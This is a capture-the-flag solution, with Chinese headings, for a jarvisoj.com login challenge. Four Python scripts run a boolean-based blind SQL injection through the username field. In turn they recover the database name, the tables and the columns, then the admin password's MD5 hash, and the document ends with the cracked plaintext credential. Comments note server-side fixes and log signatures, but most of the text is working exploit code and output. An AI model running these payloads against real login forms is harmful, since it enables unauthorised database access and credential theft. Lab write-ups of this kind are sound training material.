爆数据库
# Boolean-based blind SQL injection against the login form's 'username' field.
# The payload only works if the server concatenates the submitted username
# straight into its SQL query (i.e. no parameterised query); the script then
# recovers the current database name one character at a time, using the
# response length as a true/false oracle. The fix on the server side is
# a prepared statement; the giveaway in logs is a burst of POSTs whose
# username contains "'or/**/ascii(substr(" with a counter that increments.
import string
import requests

url = 'http://web.jarvisoj.com:32787/login.php'
# Candidate alphabet: digits + upper/lower-case letters + punctuation.
s = string.digits + string.ascii_letters + string.punctuation

# Only 'username' is varied; 'password' is a dummy value.
payload = {
    'username' : '',
    'password' : 1
}
result = ''
# Injected condition: {0} is the 1-based character position, {1} the ASCII
# code being tested. '/**/' stands in for whitespace, and '#' comments out
# the remainder of the original query (MySQL syntax).
username_template = "'or/**/ascii(substr(database(),{0},1))={1}#"
st = 0
for i in range(1,50): # i = character position in the database name (positions 1..49 tried)
    st = 0 # becomes 1 once any candidate matched at this position
    for c in s :
        asc = ord(c) # compare the ASCII code so no quotes are needed in the payload
        payload['username'] = username_template.format(i,asc)
        response = requests.post(url, data=payload)
        # Oracle: a shorter response body means the injected condition was true.
        # The 1192 threshold was read off by adding print(len(response.text));
        # it is specific to this target and must be re-measured elsewhere.
        # Note the inner loop does not stop after a match; every candidate is tried.
        if len(response.text) < 1192 :
            result += c
            print('database: ', result)
            st = 1
    if st == 0: # no candidate matched -> the end of the name has been reached
        break
print('database: ', result)
database=injection
爆表名
# Same boolean-based blind injection as the database-name step (same target,
# same alphabet, same 1192-byte length oracle); only the injected
# sub-query differs. Here it enumerates the table names of the current
# database via information_schema. That the sub-query is allowed at all
# means the application account can read information_schema -- least
# privilege on the DB user would not stop the injection but would limit
# what a blind attacker can enumerate.
import string
import requests

url = 'http://web.jarvisoj.com:32787/login.php'
# Candidate alphabet: digits + upper/lower-case letters + punctuation.
s = string.digits + string.ascii_letters + string.punctuation

# Only 'username' is varied; 'password' is a dummy value.
payload = {
    'username' : '',
    'password' : 1
}
result = ''
# group_concat() collapses all table names of database() into one
# comma-separated string, which is then read one character at a time.
# {0} = 1-based position, {1} = ASCII code under test; '#' ends the query.
username_template = "'or/**/ascii(substr((select/**/group_concat(table_name)from/**/information_schema.tables/**/where/**/table_schema=database()),{0},1))={1}#"
st = 0
for i in range(1,50): # i = character position in the concatenated table list
    st = 0 # becomes 1 once any candidate matched at this position
    for c in s :
        asc = ord(c)
        payload['username'] = username_template.format(i,asc)
        response = requests.post(url, data=payload)
        # Oracle: response shorter than 1192 bytes <=> condition true
        # (threshold measured for this target only).
        if len(response.text) < 1192 :
            result += c
            print('tables: ', result)
            st = 1
    if st == 0: # no candidate matched -> end of the string
        break
print('tables: ', result)
tables: admin
爆列名
# Third step of the same blind injection: enumerate the column names of the
# table found in the previous step. The table name 'admin' is hard-coded
# into the template, so this script is not reusable as-is for other tables.
# Target, alphabet, loop structure and the 1192-byte oracle are unchanged.
import string
import requests

url = 'http://web.jarvisoj.com:32787/login.php'
# Candidate alphabet: digits + upper/lower-case letters + punctuation.
s = string.digits + string.ascii_letters + string.punctuation

# Only 'username' is varied; 'password' is a dummy value.
payload = {
    'username' : '',
    'password' : 1
}
result = ''
# group_concat(column_name) yields one comma-separated string of all
# columns of table 'admin' (from information_schema.columns).
# {0} = 1-based position, {1} = ASCII code under test; '#' ends the query.
username_template = "'or/**/ascii(substr((select/**/group_concat(column_name)from/**/information_schema.columns/**/where/**/table_name='admin'),{0},1))={1}#"
st = 0
for i in range(1,50): # i = character position in the concatenated column list
    st = 0 # becomes 1 once any candidate matched at this position
    for c in s :
        asc = ord(c)
        payload['username'] = username_template.format(i,asc)
        response = requests.post(url, data=payload)
        # Oracle: response shorter than 1192 bytes <=> condition true
        # (threshold measured for this target only).
        if len(response.text) < 1192 :
            result += c
            print('columns: ', result)
            st = 1
    if st == 0: # no candidate matched -> end of the string
        break
print('columns: ', result)
columns: id,username,password
爆值
# Final step of the same blind injection: read the 'password' column of the
# 'admin' table one character at a time. The sub-query assumes the table
# holds a single row (no LIMIT or WHERE), which the earlier steps did not
# establish. The recovered value is an unsalted hash of a fixed length;
# storing credentials this way is what makes the subsequent offline
# cracking step possible -- a salted, slow hash (bcrypt/argon2) would not
# stop the injection but would make the dumped value far less useful.
import string
import requests

url = 'http://web.jarvisoj.com:32787/login.php'
# Candidate alphabet: digits + upper/lower-case letters + punctuation.
s = string.digits + string.ascii_letters + string.punctuation

# Only 'username' is varied; 'password' is a dummy value.
payload = {
    'username' : '',
    'password' : 1
}
result = ''
# {0} = 1-based position in the password value, {1} = ASCII code under test;
# '/**/' replaces whitespace and '#' ends the query.
username_template = "'or/**/ascii(substr((select/**/password/**/from/**/admin),{0},1))={1}#"
st = 0
for i in range(1,50): # i = character position in the stored password value
    st = 0 # becomes 1 once any candidate matched at this position
    for c in s :
        asc = ord(c)
        payload['username'] = username_template.format(i,asc)
        response = requests.post(url, data=payload)
        # Oracle: response shorter than 1192 bytes <=> condition true
        # (threshold measured for this target only).
        if len(response.text) < 1192 :
            result += c
            print('password: ', result)
            st = 1
    if st == 0: # no candidate matched -> end of the string
        break
print('password: ', result)
password: 334cfb59c9d74849801d5acdcfdaadc3
对该 MD5 值解密后，得到最终提交的登录数据：
username=admin&password=eTAloCrEP